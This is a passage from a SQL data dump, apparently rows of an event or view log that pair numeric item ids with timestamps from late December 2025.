(23483, NULL, NULL, 2058, 1, '2025-12-20 00:16:26'),
(23484, NULL, NULL, 2053, 1, '2025-12-20 00:16:26'),
(23485, NULL, NULL, 2053, 1, '2025-12-20 00:16:27'),
(23486, NULL, NULL, 2055, 1, '2025-12-20 00:16:27'),
(23487, NULL, NULL, 2055, 1, '2025-12-20 00:16:28'),
(23488, NULL, NULL, 2055, 1, '2025-12-20 00:16:28'),
(23489, NULL, NULL, 2059, 1, '2025-12-20 00:16:29'),
(23490, NULL, NULL, 2059, 1, '2025-12-20 00:16:29'),
(23491, NULL, NULL, 2053, 1, '2025-12-20 00:16:29'),
(23492, NULL, NULL, 2059, 1, '2025-12-20 00:16:29'),
(23493, NULL, NULL, 2058, 1, '2025-12-20 00:16:30'),
(23494, NULL, NULL, 2054, 1, '2025-12-20 00:16:30'),
(23495, NULL, NULL, 2055, 1, '2025-12-20 00:16:30'),
(23496, NULL, NULL, 2059, 1, '2025-12-20 00:16:30'),
(23497, NULL, NULL, 2054, 1, '2025-12-20 00:16:31'),
(23498, NULL, NULL, 2059, 1, '2025-12-20 00:16:31'),
(23499, NULL, NULL, 2059, 1, '2025-12-20 00:16:31'),
(23500, NULL, NULL, 2058, 1, '2025-12-20 00:16:32'),
(23501, NULL, NULL, 2059, 1, '2025-12-20 00:16:32'),
(23502, NULL, NULL, 2053, 1, '2025-12-20 00:16:32'),
(23503, NULL, NULL, 2060, 1, '2025-12-20 00:16:32'),
(23504, NULL, NULL, 2060, 1, '2025-12-20 00:16:32'),
(23505, NULL, NULL, 2054, 1, '2025-12-20 00:16:33'),
(23506, NULL, NULL, 2060, 1, '2025-12-20 00:16:33'),
(23507, NULL, NULL, 2060, 1, '2025-12-20 00:16:33'),
(23508, NULL, NULL, 2058, 1, '2025-12-20 00:16:33'),
(23509, NULL, NULL, 2060, 1, '2025-12-20 00:16:34'),
(23510, NULL, NULL, 2058, 1, '2025-12-20 00:16:34'),
(23511, NULL, NULL, 2060, 1, '2025-12-20 00:16:34'),
(23512, NULL, NULL, 2060, 1, '2025-12-20 00:16:34'),
(23513, NULL, NULL, 2054, 1, '2025-12-20 00:16:35'),
(23514, NULL, NULL, 2058, 1, '2025-12-20 00:16:35'),
(23515, NULL, NULL, 2054, 1, '2025-12-20 00:16:35'),
(23516, NULL, NULL, 2054, 1, '2025-12-20 00:16:36'),
(23517, NULL, NULL, 2058, 1, '2025-12-20 00:16:36'),
(23518, NULL, NULL, 2058, 1, '2025-12-20 00:16:39'),
(23519, NULL, NULL, 2058, 1, '2025-12-20 00:16:39'),
(23520, NULL, NULL, 2058, 1, '2025-12-20 00:16:42'),
(23521, NULL, NULL, 2058, 1, '2025-12-20 00:16:42'),
(23522, NULL, NULL, 2058, 1, '2025-12-20 00:16:44'),
(23523, NULL, NULL, 2058, 1, '2025-12-20 00:16:47'),
(23524, NULL, NULL, 2058, 1, '2025-12-20 00:16:47'),
(23525, NULL, NULL, 2054, 1, '2025-12-20 00:16:48'),
(23526, NULL, NULL, 2058, 1, '2025-12-20 00:16:49'),
(23527, NULL, NULL, 2058, 1, '2025-12-20 00:16:50'),
(23528, NULL, NULL, 2058, 1, '2025-12-20 00:16:50'),
(23529, NULL, NULL, 2058, 1, '2025-12-20 00:16:52'),
(23530, NULL, NULL, 2054, 1, '2025-12-20 00:16:54'),
(23531, NULL, NULL, 2059, 1, '2025-12-20 00:16:55'),
(23532, NULL, NULL, 2058, 1, '2025-12-20 00:16:55'),
(23533, NULL, NULL, 2058, 1, '2025-12-20 00:16:57'),
(23534, NULL, NULL, 2058, 1, '2025-12-20 00:16:58'),
(23535, NULL, NULL, 2054, 1, '2025-12-20 00:31:05'),
(23536, NULL, NULL, 2064, 1, '2025-12-20 00:42:15'),
(23537, NULL, NULL, 2054, 1, '2025-12-20 00:49:04'),
(23538, NULL, NULL, 2054, 1, '2025-12-20 04:09:56'),
(23539, NULL, NULL, 2064, 1, '2025-12-20 05:34:30'),
(23540, NULL, NULL, 2061, 1, '2025-12-20 06:04:22'),
(23541, NULL, NULL, 2054, 1, '2025-12-20 06:19:12'),
(23542, NULL, NULL, 2064, 1, '2025-12-20 07:31:53'),
(23543, NULL, NULL, 2064, 1, '2025-12-20 08:31:15'),
(23544, NULL, NULL, 2054, 1, '2025-12-20 08:36:44'),
(23545, NULL, NULL, 2063, 1, '2025-12-20 08:39:24'),
(23546, NULL, NULL, 2058, 1, '2025-12-20 08:46:47'),
(23547, NULL, NULL, 2064, 1, '2025-12-20 09:06:32'),
(23548, NULL, NULL, 2063, 1, '2025-12-20 09:30:13'),
(23549, NULL, NULL, 2064, 1, '2025-12-20 11:16:10'),
(23550, NULL, NULL, 2061, 1, '2025-12-20 11:19:18'),
(23551, NULL, NULL, 2060, 1, '2025-12-20 12:36:35'),
(23552, NULL, NULL, 2060, 1, '2025-12-20 12:36:40'),
(23553, NULL, NULL, 2060, 1, '2025-12-20 12:41:03'),
(23554, NULL, NULL, 2053, 1, '2025-12-20 13:36:46'),
(23555, NULL, NULL, 2060, 1, '2025-12-20 13:38:39'),
(23556, NULL, NULL, 2060, 1, '2025-12-20 13:38:42'),
(23557, NULL, NULL, 2054, 1, '2025-12-20 14:14:11'),
(23558, NULL, NULL, 2064, 1, '2025-12-20 14:36:48'),
(23559, NULL, NULL, 2060, 1, '2025-12-20 15:04:02'),
(23560, NULL, NULL, 2062, 1, '2025-12-20 15:21:46'),
(23561, NULL, NULL, 2062, 1, '2025-12-20 16:03:00'),
(23562, NULL, NULL, 2064, 1, '2025-12-20 16:59:22'),
(23563, NULL, NULL, 2054, 1, '2025-12-20 17:30:32'),
(23564, NULL, NULL, 2059, 1, '2025-12-20 17:32:29'),
(23565, NULL, NULL, 2061, 1, '2025-12-20 17:53:27'),
(23566, NULL, NULL, 2063, 1, '2025-12-20 18:12:25'),
(23567, NULL, NULL, 2054, 1, '2025-12-20 20:27:40'),
(23568, NULL, NULL, 2064, 1, '2025-12-20 22:02:25'),
(23569, NULL, NULL, 2054, 1, '2025-12-20 23:38:44'),
(23570, NULL, NULL, 2062, 1, '2025-12-21 00:37:50'),
(23571, NULL, NULL, 2061, 1, '2025-12-21 00:48:50'),
(23572, NULL, NULL, 2058, 1, '2025-12-21 00:58:26'),
(23573, NULL, NULL, 2055, 1, '2025-12-21 01:08:45'),
(23574, NULL, NULL, 2055, 1, '2025-12-21 01:17:27'),
(23575, NULL, NULL, 2058, 1, '2025-12-21 01:17:28'),
(23576, NULL, NULL, 2054, 1, '2025-12-21 01:17:55'),
(23577, NULL, NULL, 2064, 1, '2025-12-21 01:37:08'),
(23578, NULL, NULL, 2059, 1, '2025-12-21 03:51:21'),
(23579, NULL, NULL, 2054, 1, '2025-12-21 04:54:37'),
(23580, NULL, NULL, 2064, 1, '2025-12-21 05:01:35'),
(23581, NULL, NULL, 2060, 1, '2025-12-21 05:55:21'),
(23582, NULL, NULL, 2064, 1, '2025-12-21 06:30:51'),
(23583, NULL, NULL, 2060, 1, '2025-12-21 07:06:56'),
(23584, NULL, NULL, 2053, 1, '2025-12-21 07:31:01'),
(23585, NULL, NULL, 2063, 1, '2025-12-21 07:32:34'),
(23586, NULL, NULL, 2064, 1, '2025-12-21 07:33:20'),
(23587, NULL, NULL, 2055, 1, '2025-12-21 07:37:59'),
(23588, NULL, NULL, 2062, 1, '2025-12-21 07:38:20'),
(23589, NULL, NULL, 2055, 1, '2025-12-21 08:02:54'),
(23590, NULL, NULL, 2059, 1, '2025-12-21 08:57:18'),
(23591, NULL, NULL, 2060, 1, '2025-12-21 08:57:22'),
(23592, NULL, NULL, 2055, 1, '2025-12-21 11:46:02'),
(23593, NULL, NULL, 2060, 1, '2025-12-21 11:48:30'),
(23594, NULL, NULL, 2063, 1, '2025-12-21 11:54:55'),
(23595, NULL, NULL, 2058, 1, '2025-12-21 12:11:16'),
(23596, NULL, NULL, 2054, 1, '2025-12-21 12:19:35'),
(23597, NULL, NULL, 2055, 1, '2025-12-21 12:39:27'),
(23598, NULL, NULL, 2061, 1, '2025-12-21 13:28:36'),
(23599, NULL, NULL, 2062, 1, '2025-12-21 13:58:15'),
(23600, NULL, NULL, 2064, 1, '2025-12-21 14:11:09'),
(23601, NULL, NULL, 2054, 1, '2025-12-21 14:54:34'),
(23602, NULL, NULL, 2059, 1, '2025-12-21 15:06:20'),
(23603, NULL, NULL, 2064, 1, '2025-12-21 15:16:20'),
(23604, NULL, NULL, 2062, 1, '2025-12-21 17:08:56'),
(23605, NULL, NULL, 2060, 1, '2025-12-21 17:10:07'),
(23606, NULL, NULL, 2060, 1, '2025-12-21 18:12:19'),
(23607, NULL, NULL, 2062, 1, '2025-12-21 18:29:25'),
(23608, NULL, NULL, 2064, 1, '2025-12-21 18:30:48'),
(23609, NULL, NULL, 2061, 1, '2025-12-21 18:51:18'),
(23610, NULL, NULL, 2062, 1, '2025-12-21 18:54:03'),
(23611, NULL, NULL, 2064, 1, '2025-12-21 21:16:16'),
(23612, NULL, NULL, 2061, 1, '2025-12-21 21:34:29'),
(23613, NULL, NULL, 2064, 1, '2025-12-21 22:24:26'),
(23614, NULL, NULL, 2064, 1, '2025-12-21 22:32:18'),
(23615, NULL, NULL, 2054, 1, '2025-12-21 23:25:23'),
(23616, NULL, NULL, 2054, 1, '2025-12-22 01:02:21'),
(23617, NULL, NULL, 2053, 1, '2025-12-22 04:51:28'),
(23618, NULL, NULL, 2061, 1, '2025-12-22 07:04:48'),
(23619, NULL, NULL, 2059, 1, '2025-12-22 07:11:06'),
(23620, NULL, NULL, 2058, 1, '2025-12-22 07:11:26'),
(23621, NULL, NULL, 2063, 1, '2025-12-22 07:12:21'),
(23622, NULL, NULL, 2062, 1, '2025-12-22 07:13:00'),
(23623, NULL, NULL, 2054, 1, '2025-12-22 08:00:59'),
(23624, NULL, NULL, 2060, 1, '2025-12-22 10:00:11'),
(23625, NULL, NULL, 2064, 1, '2025-12-22 12:50:47'),
(23626, NULL, NULL, 2054, 1, '2025-12-22 12:59:30'),
(23627, NULL, NULL, 2060, 1, '2025-12-22 15:12:08'),
(23628, NULL, NULL, 2064, 1, '2025-12-22 16:21:35'),
(23629, NULL, NULL, 2062, 1, '2025-12-22 16:45:57'),
(23630, NULL, NULL, 2054, 1, '2025-12-22 16:48:54'),
(23631, NULL, NULL, 2062, 1, '2025-12-22 17:48:00'),
(23632, NULL, NULL, 2064, 1, '2025-12-22 18:02:47'),
(23633, NULL, NULL, 2054, 1, '2025-12-22 19:43:33'),
(23634, NULL, NULL, 2058, 1, '2025-12-22 19:43:34'),
(23635, NULL, NULL, 2064, 1, '2025-12-22 22:24:00'),
(23636, NULL, NULL, 2062, 1, '2025-12-22 23:33:33'),
(23637, NULL, NULL, 2053, 1, '2025-12-23 01:53:11'),
(23638, NULL, NULL, 2059, 1, '2025-12-23 03:33:45'),
(23639, NULL, NULL, 2054, 1, '2025-12-23 04:28:47'),
(23640, NULL, NULL, 2060, 1, '2025-12-23 05:01:29'),
(23641, NULL, NULL, 2060, 1, '2025-12-23 06:05:57'),
(23642, NULL, NULL, 2053, 1, '2025-12-23 07:32:49'),
(23643, NULL, NULL, 2063, 1, '2025-12-23 07:36:01'),
(23644, NULL, NULL, 2064, 1, '2025-12-23 07:36:07'),
(23645, NULL, NULL, 2055, 1, '2025-12-23 07:36:10'),
(23646, NULL, NULL, 2062, 1, '2025-12-23 07:36:48'),
(23647, NULL, NULL, 2064, 1, '2025-12-23 08:22:54'),
(23648, NULL, NULL, 2054, 1, '2025-12-23 08:27:37'),
(23649, NULL, NULL, 2054, 1, '2025-12-23 11:24:51'),
(23650, NULL, NULL, 2053, 1, '2025-12-23 12:05:07'),
(23651, NULL, NULL, 2058, 1, '2025-12-23 12:44:05'),
(23652, NULL, NULL, 2060, 1, '2025-12-23 13:48:39'),
(23653, NULL, NULL, 2064, 1, '2025-12-23 14:13:23'),
(23654, NULL, NULL, 2060, 1, '2025-12-23 15:17:17'),
(23655, NULL, NULL, 2055, 1, '2025-12-23 15:59:35'),
(23656, NULL, NULL, 2064, 1, '2025-12-23 16:05:50'),
(23657, NULL, NULL, 2062, 1, '2025-12-23 16:41:13'),
(23658, NULL, NULL, 2062, 1, '2025-12-23 18:13:23'),
(23659, NULL, NULL, 2059, 1, '2025-12-23 18:53:57'),
(23660, NULL, NULL, 2060, 1, '2025-12-23 19:29:38'),
(23661, NULL, NULL, 2058, 1, '2025-12-23 19:41:12'),
(23662, NULL, NULL, 2055, 1, '2025-12-23 19:41:27'),
(23663, NULL, NULL, 2062, 1, '2025-12-23 19:41:58'),
(23664, NULL, NULL, 2060, 1, '2025-12-23 19:45:56'),
(23665, NULL, NULL, 2063, 1, '2025-12-23 19:52:12'),
(23666, NULL, NULL, 2059, 1, '2025-12-23 19:53:41'),
(23667, NULL, NULL, 2064, 1, '2025-12-23 19:57:50'),
(23668, NULL, NULL, 2054, 1, '2025-12-23 19:58:57'),
(23669, NULL, NULL, 2061, 1, '2025-12-23 20:22:23'),
(23670, NULL, NULL, 2053, 1, '2025-12-23 22:54:54'),
(23671, NULL, NULL, 2054, 1, '2025-12-23 23:12:34'),
(23672, NULL, NULL, 2054, 1, '2025-12-23 23:44:29'),
(23673, NULL, NULL, 2064, 1, '2025-12-24 02:27:21'),
(23674, NULL, NULL, 2064, 1, '2025-12-24 04:15:36'),
(23675, NULL, NULL, 2060, 1, '2025-12-24 04:37:51'),
(23676, NULL, NULL, 2060, 1, '2025-12-24 04:37:54'),
(23677, NULL, NULL, 2060, 1, '2025-12-24 05:45:40'),
(23678, NULL, NULL, 2060, 1, '2025-12-24 05:45:43'),
(23679, NULL, NULL, 2060, 1, '2025-12-24 06:37:38'),
(23680, NULL, NULL, 2064, 1, '2025-12-24 07:03:35'),
(23681, NULL, NULL, 2060, 1, '2025-12-24 11:35:12'),
(23682, NULL, NULL, 2062, 1, '2025-12-24 11:40:16'),
(23683, NULL, NULL, 2060, 1, '2025-12-24 11:41:28'),
(23684, NULL, NULL, 2064, 1, '2025-12-24 12:04:36'),
(23685, NULL, NULL, 2055, 1, '2025-12-24 12:14:55'),
(23686, NULL, NULL, 2054, 1, '2025-12-24 12:43:58'),
(23687, NULL, NULL, 2054, 1, '2025-12-24 13:04:47'),
(23688, NULL, NULL, 2053, 1, '2025-12-24 13:21:01'),
(23689, NULL, NULL, 2058, 1, '2025-12-24 13:46:39'),
(23690, NULL, NULL, 2059, 1, '2025-12-24 15:05:51'),
(23691, NULL, NULL, 2062, 1, '2025-12-24 15:19:28'),
(23692, NULL, NULL, 2064, 1, '2025-12-24 15:21:02'),
(23693, NULL, NULL, 2054, 1, '2025-12-24 15:24:19'),
(23694, NULL, NULL, 2062, 1, '2025-12-24 15:27:42'),
(23695, NULL, NULL, 2059, 1, '2025-12-24 15:31:47'),
(23696, NULL, NULL, 2061, 1, '2025-12-24 15:32:11'),
(23697, NULL, NULL, 2062, 1, '2025-12-24 15:32:17'),
(23698, NULL, NULL, 2058, 1, '2025-12-24 15:33:15'),
(23699, NULL, NULL, 2063, 1, '2025-12-24 15:36:47'),
(23700, NULL, NULL, 2062, 1, '2025-12-24 15:36:49'),
(23701, NULL, NULL, 2061, 1, '2025-12-24 15:53:46'),
(23702, NULL, NULL, 2063, 1, '2025-12-24 15:59:48'),
(23703, NULL, NULL, 2064, 1, '2025-12-24 16:19:11'),
(23704, NULL, NULL, 2062, 1, '2025-12-24 16:20:47'),
(23705, NULL, NULL, 2064, 1, '2025-12-24 17:19:36'),
(23706, NULL, NULL, 2062, 1, '2025-12-24 17:24:44'),
(23707, NULL, NULL, 2064, 1, '2025-12-24 17:26:06'),
(23708, NULL, NULL, 2059, 1, '2025-12-24 17:36:26'),
(23709, NULL, NULL, 2060, 1, '2025-12-24 20:04:52'),
(23710, NULL, NULL, 2061, 1, '2025-12-24 20:11:55'),
(23711, NULL, NULL, 2060, 1, '2025-12-24 22:23:29'),
(23712, NULL, NULL, 2060, 1, '2025-12-24 23:14:28'),
(23713, NULL, NULL, 2060, 1, '2025-12-24 23:33:39'),
(23714, NULL, NULL, 2064, 1, '2025-12-25 00:29:10'),
(23715, NULL, NULL, 2054, 1, '2025-12-25 02:41:54'),
(23716, NULL, NULL, 2054, 1, '2025-12-25 02:50:36'),
(23717, NULL, NULL, 2064, 1, '2025-12-25 04:30:34'),
(23718, NULL, NULL, 2053, 1, '2025-12-25 07:33:11'),
(23719, NULL, NULL, 2063, 1, '2025-12-25 07:33:27'),
(23720, NULL, NULL, 2064, 1, '2025-12-25 07:42:23'),
(23721, NULL, NULL, 2055, 1, '2025-12-25 07:42:59'),
(23722, NULL, NULL, 2062, 1, '2025-12-25 07:43:29'),
(23723, NULL, NULL, 2059, 1, '2025-12-25 09:36:01'),
(23724, NULL, NULL, 2054, 1, '2025-12-25 10:14:31'),
(23725, NULL, NULL, 2054, 1, '2025-12-25 11:28:01'),
(23726, NULL, NULL, 2064, 1, '2025-12-25 12:52:45'),
(23727, NULL, NULL, 2054, 1, '2025-12-25 14:41:27'),
(23728, NULL, NULL, 2064, 1, '2025-12-25 15:25:11'),
(23729, NULL, NULL, 2064, 1, '2025-12-25 15:56:22'),
(23730, NULL, NULL, 2058, 1, '2025-12-25 17:18:27'),
(23731, NULL, NULL, 2059, 1, '2025-12-25 18:14:08'),
(23732, NULL, NULL, 2062, 1, '2025-12-25 18:15:40'),
(23733, NULL, NULL, 2060, 1, '2025-12-25 19:34:29'),
(23734, NULL, NULL, 2062, 1, '2025-12-25 20:47:31'),
(23735, NULL, NULL, 2063, 1, '2025-12-25 21:45:35'),
(23736, NULL, NULL, 2061, 1, '2025-12-25 22:43:30'),
(23737, NULL, NULL, 2062, 1, '2025-12-25 22:43:30'),
(23738, NULL, NULL, 2063, 1, '2025-12-25 22:43:38'),
(23739, NULL, NULL, 2062, 1, '2025-12-25 23:17:29'),
(23740, NULL, NULL, 2054, 1, '2025-12-26 03:14:10'),
(23741, NULL, NULL, 2064, 1, '2025-12-26 03:47:07'),
(23742, NULL, NULL, 2064, 1, '2025-12-26 05:25:30'),
(23743, NULL, NULL, 2060, 1, '2025-12-26 05:49:56'),
(23744, NULL, NULL, 2061, 1, '2025-12-26 07:19:26'),
(23745, NULL, NULL, 2064, 1, '2025-12-26 08:03:53'),
(23746, NULL, NULL, 2060, 1, '2025-12-26 10:05:06'),
(23747, NULL, NULL, 2055, 1, '2025-12-26 13:52:21'),
(23748, NULL, NULL, 2054, 1, '2025-12-26 15:07:38'),
(23749, NULL, NULL, 2054, 1, '2025-12-26 15:56:50'),
(23750, NULL, NULL, 2062, 1, '2025-12-26 16:41:41'),
(23751, NULL, NULL, 2062, 1, '2025-12-26 16:42:54'),
(23752, NULL, NULL, 2064, 1, '2025-12-26 17:14:16'),
(23753, NULL, NULL, 2059, 1, '2025-12-26 17:17:30'),
(23754, NULL, NULL, 2062, 1, '2025-12-26 17:19:00'),
(23755, NULL, NULL, 2063, 1, '2025-12-26 17:19:01'),
(23756, NULL, NULL, 2061, 1, '2025-12-26 17:20:02'),
(23757, NULL, NULL, 2058, 1, '2025-12-26 17:22:08'),
(23758, NULL, NULL, 2060, 1, '2025-12-26 17:22:58'),
(23759, NULL, NULL, 2054, 1, '2025-12-26 17:22:59'),
(23760, NULL, NULL, 2064, 1, '2025-12-26 17:24:51'),
(23761, NULL, NULL, 2058, 1, '2025-12-26 18:17:17'),
(23762, NULL, NULL, 2064, 1, '2025-12-26 18:18:44'),
(23763, NULL, NULL, 2064, 1, '2025-12-26 18:35:17'),
(23764, NULL, NULL, 2059, 1, '2025-12-26 18:39:01'),
(23765, NULL, NULL, 2058, 1, '2025-12-26 18:43:20'),
(23766, NULL, NULL, 2061, 1, '2025-12-26 18:43:27'),
(23767, NULL, NULL, 2063, 1, '2025-12-26 19:08:58'),
(23768, NULL, NULL, 2053, 1, '2025-12-26 20:56:31'),
(23769, NULL, NULL, 2062, 1, '2025-12-26 21:40:37'),
(23770, NULL, NULL, 2054, 1, '2025-12-26 21:52:34'),
(23771, NULL, NULL, 2061, 1, '2025-12-26 22:31:29'),
(23772, NULL, NULL, 2054, 1, '2025-12-26 22:47:10'),
(23773, NULL, NULL, 2062, 1, '2025-12-26 22:52:59'),
(23774, NULL, NULL, 2059, 1, '2025-12-26 22:53:23'),
(23775, NULL, NULL, 2063, 1, '2025-12-26 22:53:58'),
(23776, NULL, NULL, 2061, 1, '2025-12-26 22:54:29'),
(23777, NULL, NULL, 2059, 1, '2025-12-26 23:28:43'),
(23778, NULL, NULL, 2060, 1, '2025-12-27 02:27:42'),
(23779, NULL, NULL, 2054, 1, '2025-12-27 02:45:50'),
(23780, NULL, NULL, 2063, 1, '2025-12-27 03:58:33'),
(23781, NULL, NULL, 2064, 1, '2025-12-27 04:18:46'),
(23782, NULL, NULL, 2053, 1, '2025-12-27 04:29:25'),
(23783, NULL, NULL, 2064, 1, '2025-12-27 04:44:43'),
(23784, NULL, NULL, 2064, 1, '2025-12-27 07:18:04'),
(23785, NULL, NULL, 2060, 1, '2025-12-27 07:37:07'),
(23786, NULL, NULL, 2063, 1, '2025-12-27 07:44:09'),
(23787, NULL, NULL, 2054, 1, '2025-12-27 07:57:39'),
(23788, NULL, NULL, 2058, 1, '2025-12-27 08:35:10'),
(23789, NULL, NULL, 2064, 1, '2025-12-27 08:53:25'),
(23790, NULL, NULL, 2063, 1, '2025-12-27 08:53:28'),
(23791, NULL, NULL, 2062, 1, '2025-12-27 08:53:30'),
(23792, NULL, NULL, 2061, 1, '2025-12-27 08:53:33'),
(23793, NULL, NULL, 2060, 1, '2025-12-27 08:53:35'),
(23794, NULL, NULL, 2059, 1, '2025-12-27 08:53:38'),
(23795, NULL, NULL, 2058, 1, '2025-12-27 08:53:40'),
(23796, NULL, NULL, 2055, 1, '2025-12-27 08:53:42'),
(23797, NULL, NULL, 2054, 1, '2025-12-27 08:53:44'),
(23798, NULL, NULL, 2064, 1, '2025-12-27 10:13:59'),
(23799, NULL, NULL, 2053, 1, '2025-12-27 11:06:48'),
(23800, NULL, NULL, 2064, 1, '2025-12-27 11:12:28'),
(23801, NULL, NULL, 2055, 1, '2025-12-27 11:16:01'),
(23802, NULL, NULL, 2062, 1, '2025-12-27 11:17:49'),
(23803, NULL, NULL, 2054, 1, '2025-12-27 12:25:32'),
(23804, NULL, NULL, 2054, 1, '2025-12-27 16:53:58'),
(23805, NULL, NULL, 2064, 1, '2025-12-27 17:10:02'),
(23806, NULL, NULL, 2062, 1, '2025-12-27 19:01:24'),
(23807, NULL, NULL, 2064, 1, '2025-12-27 19:02:47'),
(23808, NULL, NULL, 2061, 1, '2025-12-27 19:09:27'),
(23809, NULL, NULL, 2060, 1, '2025-12-27 19:29:22'),
(23810, NULL, NULL, 2064, 1, '2025-12-27 19:31:08'),
(23811, NULL, NULL, 2063, 1, '2025-12-27 20:06:50'),
(23812, NULL, NULL, 2061, 1, '2025-12-27 20:41:21'),
(23813, NULL, NULL, 2064, 1, '2025-12-27 21:30:15'),
(23814, NULL, NULL, 2059, 1, '2025-12-27 21:39:05'),
(23815, NULL, NULL, 2060, 1, '2025-12-27 22:48:58'),
(23816, NULL, NULL, 2060, 1, '2025-12-27 22:49:01'),
(23817, NULL, NULL, 2063, 1, '2025-12-27 22:57:50'),
(23818, NULL, NULL, 2060, 1, '2025-12-27 23:51:23'),
(23819, NULL, NULL, 2060, 1, '2025-12-27 23:51:26'),
(23820, NULL, NULL, 2060, 1, '2025-12-28 00:17:57'),
(23821, NULL, NULL, 2064, 1, '2025-12-28 00:54:40'),
(23822, NULL, NULL, 2054, 1, '2025-12-28 01:24:56'),
(23823, NULL, NULL, 2060, 1, '2025-12-28 01:30:14'),
(23824, NULL, NULL, 2054, 1, '2025-12-28 02:17:00'),
(23825, NULL, NULL, 2064, 1, '2025-12-28 03:06:25'),
(23826, NULL, NULL, 2054, 1, '2025-12-28 03:23:21'),
(23827, NULL, NULL, 2064, 1, '2025-12-28 03:29:04'),
(23828, NULL, NULL, 2059, 1, '2025-12-28 04:08:24'),
(23829, NULL, NULL, 2062, 1, '2025-12-28 05:47:49'),
(23830, NULL, NULL, 2062, 1, '2025-12-28 05:51:16'),
(23831, NULL, NULL, 2061, 1, '2025-12-28 06:21:13'),
(23832, NULL, NULL, 2058, 1, '2025-12-28 06:29:21'),
(23833, NULL, NULL, 2059, 1, '2025-12-28 06:33:42'),
(23834, NULL, NULL, 2060, 1, '2025-12-28 06:33:46'),
(23835, NULL, NULL, 2062, 1, '2025-12-28 06:38:22'),
(23836, NULL, NULL, 2064, 1, '2025-12-28 08:20:46'),
(23837, NULL, NULL, 2063, 1, '2025-12-28 08:20:48'),
(23838, NULL, NULL, 2062, 1, '2025-12-28 08:20:51'),
(23839, NULL, NULL, 2061, 1, '2025-12-28 08:20:53'),
(23840, NULL, NULL, 2060, 1, '2025-12-28 08:20:56'),
(23841, NULL, NULL, 2059, 1, '2025-12-28 08:20:58'),
(23842, NULL, NULL, 2058, 1, '2025-12-28 08:21:00'),
(23843, NULL, NULL, 2055, 1, '2025-12-28 08:21:03'),
(23844, NULL, NULL, 2054, 1, '2025-12-28 08:21:05'),
(23845, NULL, NULL, 2053, 1, '2025-12-28 11:24:16'),
(23846, NULL, NULL, 2055, 1, '2025-12-28 11:46:42'),
(23847, NULL, NULL, 2064, 1, '2025-12-28 13:03:38'),
(23848, NULL, NULL, 2055, 1, '2025-12-28 13:14:27'),
(23849, NULL, NULL, 2054, 1, '2025-12-28 13:24:11'),
(23850, NULL, NULL, 2055, 1, '2025-12-28 13:43:02'),
(23851, NULL, NULL, 2060, 1, '2025-12-28 13:48:03'),
(23852, NULL, NULL, 2064, 1, '2025-12-28 13:53:04'),
(23853, NULL, NULL, 2060, 1, '2025-12-28 16:06:52'),
(23854, NULL, NULL, 2062, 1, '2025-12-28 16:20:48'),
(23855, NULL, NULL, 2062, 1, '2025-12-28 16:21:20'),
(23856, NULL, NULL, 2054, 1, '2025-12-28 16:57:31'),
(23857, NULL, NULL, 2064, 1, '2025-12-28 17:01:09'),
(23858, NULL, NULL, 2062, 1, '2025-12-28 17:27:16'),
(23859, NULL, NULL, 2062, 1, '2025-12-28 17:27:38'),
(23860, NULL, NULL, 2064, 1, '2025-12-28 17:32:13'),
(23861, NULL, NULL, 2063, 1, '2025-12-28 17:32:16'),
(23862, NULL, NULL, 2062, 1, '2025-12-28 17:32:19'),
(23863, NULL, NULL, 2061, 1, '2025-12-28 17:32:22'),
(23864, NULL, NULL, 2060, 1, '2025-12-28 17:32:25'),
(23865, NULL, NULL, 2054, 1, '2025-12-28 17:32:26'),
(23866, NULL, NULL, 2059, 1, '2025-12-28 17:32:27'),
(23867, NULL, NULL, 2064, 1, '2025-12-28 19:04:18'),
(23868, NULL, NULL, 2063, 1, '2025-12-28 20:08:30'),
(23869, NULL, NULL, 2064, 1, '2025-12-28 20:55:39'),
(23870, NULL, NULL, 2053, 1, '2025-12-28 21:02:31'),
(23871, NULL, NULL, 2064, 1, '2025-12-28 21:37:51'),
(23872, NULL, NULL, 2064, 1, '2025-12-28 21:48:21'),
(23873, NULL, NULL, 2061, 1, '2025-12-28 22:01:13'),
(23874, NULL, NULL, 2054, 1, '2025-12-28 23:03:24'),
(23875, NULL, NULL, 2060, 1, '2025-12-29 00:49:57'),
(23876, NULL, NULL, 2053, 1, '2025-12-29 01:34:10'),
(23877, NULL, NULL, 2058, 1, '2025-12-29 03:45:09'),
(23878, NULL, NULL, 2062, 1, '2025-12-29 03:45:15'),
(23879, NULL, NULL, 2061, 1, '2025-12-29 03:45:17'),
(23880, NULL, NULL, 2059, 1, '2025-12-29 03:46:01'),
(23881, NULL, NULL, 2063, 1, '2025-12-29 03:46:10'),
(23882, NULL, NULL, 2059, 1, '2025-12-29 04:03:22'),
(23883, NULL, NULL, 2058, 1, '2025-12-29 05:20:34'),
(23884, NULL, NULL, 2064, 1, '2025-12-29 05:32:04'),
(23885, NULL, NULL, 2054, 1, '2025-12-29 07:23:50'),
(23886, NULL, NULL, 2060, 1, '2025-12-29 08:57:23'),
(23887, NULL, NULL, 2054, 1, '2025-12-29 09:18:24'),
(23888, NULL, NULL, 2062, 1, '2025-12-29 10:25:14'),
(23889, NULL, NULL, 2054, 1, '2025-12-29 12:37:01'),
(23890, NULL, NULL, 2054, 1, '2025-12-29 12:41:24'),
(23891, NULL, NULL, 2064, 1, '2025-12-29 12:50:58'),
(23892, NULL, NULL, 2064, 1, '2025-12-29 15:16:10'),
(23893, NULL, NULL, 2064, 1, '2025-12-29 16:02:48'),
(23894, NULL, NULL, 2062, 1, '2025-12-29 16:26:30'),
(23895, NULL, NULL, 2055, 1, '2025-12-29 16:43:35'),
(23896, NULL, NULL, 2062, 1, '2025-12-29 16:44:26'),
(23897, NULL, NULL, 2062, 1, '2025-12-29 16:44:54'),
(23898, NULL, NULL, 2060, 1, '2025-12-29 18:26:47'),
(23899, NULL, NULL, 2064, 1, '2025-12-29 18:30:50'),
(23900, NULL, NULL, 2053, 1, '2025-12-29 18:54:11'),
(23901, NULL, NULL, 2063, 1, '2025-12-29 19:00:16'),
(23902, NULL, NULL, 2055, 1, '2025-12-29 19:03:02'),
(23903, NULL, NULL, 2062, 1, '2025-12-29 19:03:11'),
(23904, NULL, NULL, 2064, 1, '2025-12-29 19:03:59'),
(23905, NULL, NULL, 2054, 1, '2025-12-29 19:53:54'),
(23906, NULL, NULL, 2058, 1, '2025-12-29 19:53:58'),
(23907, NULL, NULL, 2055, 1, '2025-12-29 22:18:06'),
(23908, NULL, NULL, 2054, 1, '2025-12-29 22:21:45'),
(23909, NULL, NULL, 2060, 1, '2025-12-29 22:47:55'),
(23910, NULL, NULL, 2060, 1, '2025-12-29 22:56:10'),
